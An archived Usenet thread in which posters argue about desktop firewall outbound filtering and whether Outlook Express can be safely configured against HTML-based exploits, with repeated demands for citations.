thousand less applications readily available. In practice, this is like
saying "use a neglected system, you'll be able to use just a few
applications ... but very safely!" Of course, if you have to trust just
those applications you "know" aren't malware, you'll have even less
applications to install ...
7) right, but asking the average user not to make mistake is illusory.
Using the right local secutity software prevents many mistakes.
8) it depends: if the native tool does a good enough job, obviously
there is no need to resort to additional software. In many cases, e.g.
Windows XP SP2 native firewall, the native software is not "good
enough". Having available a number of good, proven and not intrusive
software, there is no reason in these cases to stay with limited native
software.
All in all, the "suggestions" can be translated in "real world" as the
"drive-slowly-and-just-into-your-backyard car safety advice":
"Do you want to be safe when driving? It's easy:
- choose a very slow and limited car, better if is a small electric car
- don't use seat belts and air bags: they are useless if you drive
slowly and, moreover, they can hurt or kill you (for example, air bags
can accidentally explode and you could drown if you have seat belts
fastened and your car falls into a pond; these things happens very
often)
- drive just in your home backyard, very carefully and very slowly
- drive just if and when you are absolutely sure nobody will go out the
door and cross the backyard
Simple, isn't it?
And you were thinking you need seat belts and air bags to be safe ..."
Absurd? Yes.
Silly? Yes, a lot.
A good debate about usefulness of outbound filtering in desktop
firewalls can be found at
http://4sysops.com/archives/is-windows-vista%e2%80%99s-firew all-crippled
I fully agree with Michael words:
"I think, the problem is that security experts often think like hackers
or malware writers. They think of ways to crack a certain system. If
they think it is easy for them, then a security solution seems useless
from their point of view. A sysadmin should think differently. If a
security solution helps in some scenarios, it is already useful. In the
end, it doesn't matter how sophisticated the malware was that crashed
my whole network. [...] The problem is that security experts often
don't acknowledge this argument. They assume that all malware avoids
detection by outbound filtering. Experience shows that this assumption
is simply wrong."
This applies perfectly also to the sad case of Sebastian Gottschalk.
Quite understandable why this guy asks for his messages not to be
archived on Google Groups ... :-D
Amen.
freesailor
Post removed (X-No-Archive: yes)
comphelp@toddh.net (Todd H.) wrote in news:84ejpk5o8f.fsf@ripco.com:
> DanS
>
>> Sebastian Gottschalk
>> news:51og5cF1k8350U1@mid.dfncis.de:
>>
>> > DanS wrote:
>> >
>> >>> Since when does opening an email attachment execute any programs?
>> >>> Since when would a sane user execute such programs? Which sane
>> >>> administrator would allow his users to run any programs?
>> >>
>> >> Well, let's see, OE used to automatically execute HTML contnet when
>> >> e-mail was viewed in the preview pane. (I would think that was fixed
>> >> by now.)
>> >
>> > Abusing Outlook Express as a newsreader is PEBKAC.
>>
>> Regardless of what PEBKAC means,
>
> problem exists between keyboard and chair.
I've seen a lot of those but never that one !!!!!!!
Sebastian Gottschalk
news:51plpaF1lh22lU1@mid.dfncis.de:
> Anyway, please clearify if you use the phrase "call home" in a
> negative sense like all the other fools do. If yes, then no such
> programs qualifies for "call home". If no, then there's nothing to
> complain about "call home".
'Call home' means just that, for any reason, WGA 'Calls home' check your
activation status, Adobe 'Calls Home' to look for updates to programs,
AV/AS 'Calls home' for definition updates.
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
news:51q670F1kuvrdU1@mid.dfncis.de:
>
> Either I didn't catch the point your irony refers to, or you don't
> imply any irony at all.
>
> In any case, abusing Outlook Express for processing eMail or News from
> non-trusted sources like teh internet or oder the warez^W Usenet is
> strongly disregarded by even the official documentation available from
> the Microsoft website. In some potentially technical brabble it tells
> exactly, that in such a scenario OE is trivially insecure and no
> matter how you configure it, anyone can trivially subvert it to
> execute arbitrary code just by you viewing an eMail (or Usenet
> posting).
Yes, but, is grandma & grandpa going to search technical documents on a
piece of software for the Wal-Mart special they just bought and spent 4
hours plugging everything in ? No, OE already installed, it must be OK,
let's use that.
>
> And even if you don't understand this technical stuff, the bug history
> and the well-known discussions on the design criteria and the
> implementation of OE should definitely give a clue to even the worst
> users. (One example was stated above.)
>
Well, I hate to say it but I do understand all of the technical mumbo jumbo
of everything.
I have a long history in the data communications field, from product design
to PCB design, to manufacturing...... and networking positions from a field
engineer deploying large scale private wireless networks, and IT manager.
And I agree, using OE for anything, is not good choice.
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
> > And what do probably 50% of POP3 e-mail users use......OE.
> Their fault. If they had read the documentation carefully, they'd know that
> OE is trivially insecure when processing nontrustworthy content.
I really don't think so. You're overestimating totally, what people
understand.
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
Sebastian Gottschalk
[deleted]
> In any case, abusing Outlook Express for processing eMail or News from
> non-trusted sources like teh internet or oder the warez^W Usenet is
> strongly disregarded by even the official documentation available from the
> Microsoft website.
Cite?
"processing eMail ... from non-trusted sources like teh internet"?
Where do *you* get your e-mail from, if not "teh internet"?
And likewise for "processing ... News from non-trusted sources like
.... Usenet".
Is that what *you* are saying or what (you say) *Microsoft* is saying?
If the former, why? If the latter, (as asked above) cite?
> In some potentially technical brabble it tells exactly, that in such a
> scenario OE is trivially insecure and no matter how you configure it,
> anyone can trivially subvert it to execute arbitrary code just by you
> viewing an eMail (or Usenet posting).
Again: Is that *your interpretation* of what Microsoft is saying, or
what Microsoft is actually saying? If the former, then you're wrong (all
it takes is changing one setting from its default). If the latter, cite.
> And even if you don't understand this technical stuff, the bug history and
> the well-known discussions on the design criteria and the implementation of
> OE should definitely give a clue to even the worst users. (One example was
> stated above.)
>
> Not to mention that it's totally broken, really hard to use and hardly
> follows any standards.
Mostly agreed, except for the "should definitely give a clue to even
the worst users".
What you call "the worst users" are *the main users*. I.e. the
intended users and the actual users. You don't have to like it and I
don't like it either, but it is a fact nonetheless. Pretending otherwise
is plain silly. It's like pretending that the average driver has F1
driver skills. Newsflash: They don't.
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
> Frank Slootweg wrote:
>
> > Sebastian Gottschalk
> > [deleted]
> >
> >> In any case, abusing Outlook Express for processing eMail or News from
> >> non-trusted sources like teh internet or oder the warez^W Usenet is
> >> strongly disregarded by even the official documentation available from the
> >> Microsoft website.
> >
> > Cite?
>
> OE inherits the vulnerabilities from IE. Cites for IE can be found in
> "Windows XP/Server 2003 Security Guide", Group Policies, Object Caching
> Protection (of course, with a good understand about the involved issue).
> You may also take a look at the policy "Automatic COM+ downloads".
That does not support what you claim Microsoft is saying. I.e. you
claim that Microsoft says that OE is not safe for e-mail/News, but those
documents don't say *that*.
> > "processing eMail ... from non-trusted sources like teh internet"?
> > Where do *you* get your e-mail from, if not "teh internet"?
>
> You're not familiar with internal messaging in a corporate environment?
Nah. I only worked in a 150K employee one. Hardly a "corporate
environment".
But seriously: Where do you think some if not most of that e-mail
*comes from / goes to*? Indeed, "teh internet". (BTW, I keep quoting
"teh" in case it is intended to be kewl, as some people think it is.)
> Indeed, that's where OE can be safely used.
OE *can* be safely used anywhere. The point is that it *isn't* used
that way. And that goes for the corporate environment as well, whether
internal or external. And it also goes for Outlook, which is more likely
to be used in a corporate environment than OE. (Frankly, I wouldn't know
of any "corporate environment" which uses OE (for e-mail (and hardly any
of them use News)).)
> > Is that what *you* are saying or what (you say) *Microsoft* is saying?
>
> Both.
Why do you silently snip the most important questions (and don't
answer them) and why don't you supply the requested proof of your
assertions?
And why do you silently snip a part where someone says that you're
wrong?
> > Mostly agreed, except for the "should definitely give a clue to even
> > the worst users".
> >
> > What you call "the worst users" are *the main users*. I.e. the
> > intended users and the actual users. You don't have to like it and I
> > don't like it either, but it is a fact nonetheless. Pretending otherwise
> > is plain silly.
>
> I'm not pretending otherwise. This is exactly fully coherent with what I
> wrote: If you should such a user a trivial diagram of how many
> vulnerabilities OE had and still has (as well as colorful indication how
> critical the vulnerabilities are), and as comparisons those of serious
> eMail programs, I'd say they definitely get the point.
Your "If" makes your comment a theoretical argument. No-one is doing
such a thing for the vast majority of the users.
So you and I and all the others in the audience may thump our chest on
how clever we all are, it doesn't change the *reality* of the
knowlegdge/experience of the vast majority of the users.
Analogy: According to my standards, 95+% of (car) drivers are lousy
ones, and, to make it more applicable, so are their cars. Does that
change anything? Nope! Do they care? Nope! Does anybody care? Nope!
I.e. I can apply *my* standards to *myself* and I can *try to* apply my
standards to *my peers*, but that's about it. The same goes for you and
your standards.
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
> Frank Slootweg wrote:
>
> >> OE inherits the vulnerabilities from IE. Cites for IE can be found in
> >> "Windows XP/Server 2003 Security Guide", Group Policies, Object Caching
> >> Protection (of course, with a good understand about the involved issue).
> >> You may also take a look at the policy "Automatic COM+ downloads".
> >
> > That does not support what you claim Microsoft is saying. I.e. you
> > claim that Microsoft says that OE is not safe for e-mail/News, but those
> > documents don't say *that*.
>
> If you understand the technical blah blah, they say exactly that: We
> implemented a trivially incomplete solution to a known design-based
> vulnerability. Thus, they documented the existence of an unpatched
> vulnerability.
Yes, but *Microsoft* is *not* *saying* that OE is not safe for e-mail/
News. *You* say that.
But enough about this. We now know for sure that you gave your
interpretation/opinion, not any statement from Microsoft.
> Anyone could exploit it as he wants, and you can't do anything against it.
Yes, one *can* "do anything against it". Your continued silent
snipping does not change that fact.
> That's indeed unsafe.
FWIW, I fully agree that OE's *default* configuration is quite unsafe
and that is indeed a big problem.
[deleted]
> >> Indeed, that's where OE can be safely used.
> >
> > OE *can* be safely used anywhere.
>
> Wrong. It you can receive untrusted mail content, then no configuration of
> careful user behaviour whatsoever could protect it against being trivially
> exploitet.
Wrong. As I said, all it takes is changing one setting from its
default.
> >> I'm not pretending otherwise. This is exactly fully coherent with what I
> >> wrote: If you should such a user a trivial diagram of how many
> >> vulnerabilities OE had and still has (as well as colorful indication how
> >> critical the vulnerabilities are), and as comparisons those of serious
> >> eMail programs, I'd say they definitely get the point.
> >
> > Your "If" makes your comment a theoretical argument.
>
> No one talked about application, just about who's to blame for the problem.
>
> > No-one is doing such a thing for the vast majority of the users.
>
> Well, any reasonably acting user would aquire such knowledge by themselves.
> Thus, if they don't, it's PEBKAC, the user is to blame.
Your "any reasonably acting user" is a minute minority. It's so minute
that *it* is hardly relevant.
So you can jump up and down all you like and yell PEBKAC, but, as I
said and you snipped, it's not going to change anything in the *real*
world.
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
> Frank Slootweg wrote:
>
> > Sebastian Gottschalk
> >> Frank Slootweg wrote:
> >>
> >>>> OE inherits the vulnerabilities from IE. Cites for IE can be found in
> >>>> "Windows XP/Server 2003 Security Guide", Group Policies, Object Caching
> >>>> Protection (of course, with a good understand about the involved issue).
> >>>> You may also take a look at the policy "Automatic COM+ downloads".
> >>>
> >>> That does not support what you claim Microsoft is saying. I.e. you
> >>> claim that Microsoft says that OE is not safe for e-mail/News, but those
> >>> documents don't say *that*.
> >>
> >> If you understand the technical blah blah, they say exactly that: We
> >> implemented a trivially incomplete solution to a known design-based
> >> vulnerability. Thus, they documented the existence of an unpatched
> >> vulnerability.
> >
> > Yes, but *Microsoft* is *not* *saying* that OE is not safe for e-mail/
> > News.
>
> It's the trivial conclusion of what they say. Thus, *saying* is correct.
Nobody with any sense buys such 'reasoning', so, as I said, let's
leave it at that.
> >> Anyone could exploit it as he wants, and you can't do anything against it.
> >
> > Yes, one *can* "do anything against it".
>
> And what?
As I said, changing one setting from its default.
> > Your continued silent snipping does not change that fact.
>
> What fact? Do you know anything? Beside any claimed magic? Any super-hidden
> preference which allows you to disable HTML rendering in OE in every case,
> including all the known bugs which trigger it?
See above. Just a simple case of RTFM. Isn't that what you always
blame others they don't do? In this case RTFM is as simple as RTFMenu,
i.e. you don't even have to RTFManual.
> >> That's indeed unsafe.
> >
> > FWIW, I fully agree that OE's *default* configuration is quite unsafe
> > and that is indeed a big problem.
>
> Every configuration of OE is unsafe.
Nope. Repeating a falsehood doesn't make it true.
> >> Wrong. It you can receive untrusted mail content, then no configuration of
> >> careful user behaviour whatsoever could protect it against being trivially
> >> exploitet.
> >
> > Wrong. As I said, all it takes is changing one setting from its
> > default.
>
> You didn't say anything so far. And I heavily doubt the existence of such
> an option.
Yes, I did. You just snipped it in your reply. Your doubt is
irrelevant.
> And, as I stated above, the obvious options don't work.
The option is obvious to anyone with even the slightest clue.
> > So you can jump up and down all you like and yell PEBKAC, but, as I
> > said and you snipped, it's not going to change anything in the *real*
> > world.
>
> This was never on discussion. You jumped on it. And didn't even explain
> why.
Because yelling PEBKAC is unrealistic in this scenario. If you had
read what you snipped, that should have been obvious. But since this is
just a matter of opinion instead of fact, we might as well leave *this*
point as is. It's not likely that either of us is going to change their
opinion, is it? :-)
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
news:51v31cF1lim65U1@mid.dfncis.de:
>
> And, just for your convience I already assumed that you were
> implicitly referring to the HTML vs. text rendering/creation option,
> which I already denoted as non-working due to many bogus triggers
> (which seems to be just well known to anyone except you). Now, how
> stupid do you want to get?
>
> Maybe I just rephrase it, just that you finally get it: Deactivating
> HTML rendering in the configuration dialog doesn't help anything to
> actually fully deactivate HTML rendering.
Where does it say that on the MS webpage ? Or any webpage ?
When using text only viewer, the display pane is not an IE control, but
instead a Rich Edit control, thus dumping all HTML tags.
http://support.microsoft.com/kb/883257#4
A web page ? An article ? Anything ? Come on.
You keep spouting off proven this, proven that, etc, yet you offer no
sources for this. You blabber on with technical mumbo jumbo hoping to
make everyone think you are super-genius geek boy that know's everything
there is to know.
You can't even post ONE link to a reputable site with an article that
confirms your claims....ANY one of your claims.
Sebastian Gottschalk
[much deleted]
> So, where is your mysterious option? You're really a bad liar.
No ad Hominems please. I was beating around the bush in response to
*your* vagueness.
> And, just for your convience I already assumed that you were implicitly
> referring to the HTML vs. text rendering/creation option,
"/creation option"? I think that we are still talking about different
things. Feel free to tell which *specific* option *you* are talking about,
i.e. by full 'name' and preferably with (menu) 'navigation' instructions.
> which I already
> denoted as non-working due to many bogus triggers (which seems to be just
> well known to anyone except you). Now, how stupid do you want to get?
Humor my 'stupidity' by providing some (verifiable) references for
said "well known bogus triggers".
No offense, but providing (verifiable) proof for your assertions,
doesn't seem to be one of your strong points. All too easy you dismiss
things by assuming/saying your correspondent to be stupid, incompetent,
etc.. And when your correspondent points out your error(s), you keep
silent. Not a very impressive discussion style.
> Maybe I just rephrase it, just that you finally get it: Deactivating HTML
> rendering in the configuration dialog doesn't help anything to actually
> fully deactivate HTML rendering.
Awaiting your proof. (And please show that said (remaining) "HTML
rendering" is actually *harmful*.)
[deleted]
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
@mid.dfncis.de:
>>>
>>> Maybe I just rephrase it, just that you finally get it: Deactivating
>>> HTML rendering in the configuration dialog doesn't help anything to
>>> actually fully deactivate HTML rendering.
>>
>> Where does it say that on the MS webpage ? Or any webpage ?
>>
>> When using text only viewer, the display pane is not an IE control,
but
>> instead a Rich Edit control, thus dumping all HTML tags.
>
> See above.
>
>> http://support.microsoft.com/kb/883257#4
>>
>> A web page ? An article ? Anything ? Come on.
>
> What is Google? Yahoo? MSN Search? Come on.
What is google......hmmm......a giant search engine that I used to search
for your claims and have not found any pages that back up your claims
about anything.
So, where's the link I asked for ?
> So far, the simplest of such triggers has been the Reply button. If a
> text/plain message contained some HTML tags and user tries to reply,
> sometimes it will simply snap to HTML rendering.
Sebastian Gottschalk wrote:
> DanS wrote:
>
>> Sebastian Gottschalk
>> news:51v31cF1lim65U1@mid.dfncis.de:
>>
>>> And, just for your convience I already assumed that you were
>>> implicitly referring to the HTML vs. text rendering/creation option,
>>> which I already denoted as non-working due to many bogus triggers
> ^^^^^^^^^^^^^^^^^^^
>>> (which seems to be just well known to anyone except you). Now, how
>>> stupid do you want to get?
>>>
>>> Maybe I just rephrase it, just that you finally get it: Deactivating
>>> HTML rendering in the configuration dialog doesn't help anything to
>>> actually fully deactivate HTML rendering.
>> Where does it say that on the MS webpage ? Or any webpage ?
>>
>> When using text only viewer, the display pane is not an IE control, but
>> instead a Rich Edit control, thus dumping all HTML tags.
>
> See above.
>
>> http://support.microsoft.com/kb/883257#4
>>
>> A web page ? An article ? Anything ? Come on.
>
> What is Google? Yahoo? MSN Search? Come on.
>
> So far, the simplest of such triggers has been the Reply button. If a
> text/plain message contained some HTML tags and user tries to reply,
> sometimes it will simply snap to HTML rendering.
You are truly a clown among clowns.
You present opinions as if they were facts, and when people ask for
any cites/proof/etc., you can do nothing more than point them to a
search engine.
Whatever credibility you may have had, is gone.
--
Notan
Sebastian Gottschalk
> DanS wrote:
>
> > Sebastian Gottschalk
> > news:51v31cF1lim65U1@mid.dfncis.de:
> >
> >> And, just for your convience I already assumed that you were
> >> implicitly referring to the HTML vs. text rendering/creation option,
> >> which I already denoted as non-working due to many bogus triggers
> ^^^^^^^^^^^^^^^^^^^
> >> (which seems to be just well known to anyone except you). Now, how
> >> stupid do you want to get?
> >>
> >> Maybe I just rephrase it, just that you finally get it: Deactivating
> >> HTML rendering in the configuration dialog doesn't help anything to
> >> actually fully deactivate HTML rendering.
> >
> > Where does it say that on the MS webpage ? Or any webpage ?
> >
> > When using text only viewer, the display pane is not an IE control, but
> > instead a Rich Edit control, thus dumping all HTML tags.
>
> See above.
>
> > http://support.microsoft.com/kb/883257#4
> >
> > A web page ? An article ? Anything ? Come on.
>
> What is Google? Yahoo? MSN Search? Come on.
Logical fallacy. May I suggest that - in addition to Debating 101 -
you enroll in Logic 101, where you will learn that one can't - and
hence doesn't have to - prove a negative.
> So far, the simplest of such triggers has been the Reply button. If a
> text/plain message contained some HTML tags and user tries to reply,
> sometimes it will simply snap to HTML rendering.
(Again, and again and ...) *Cite*.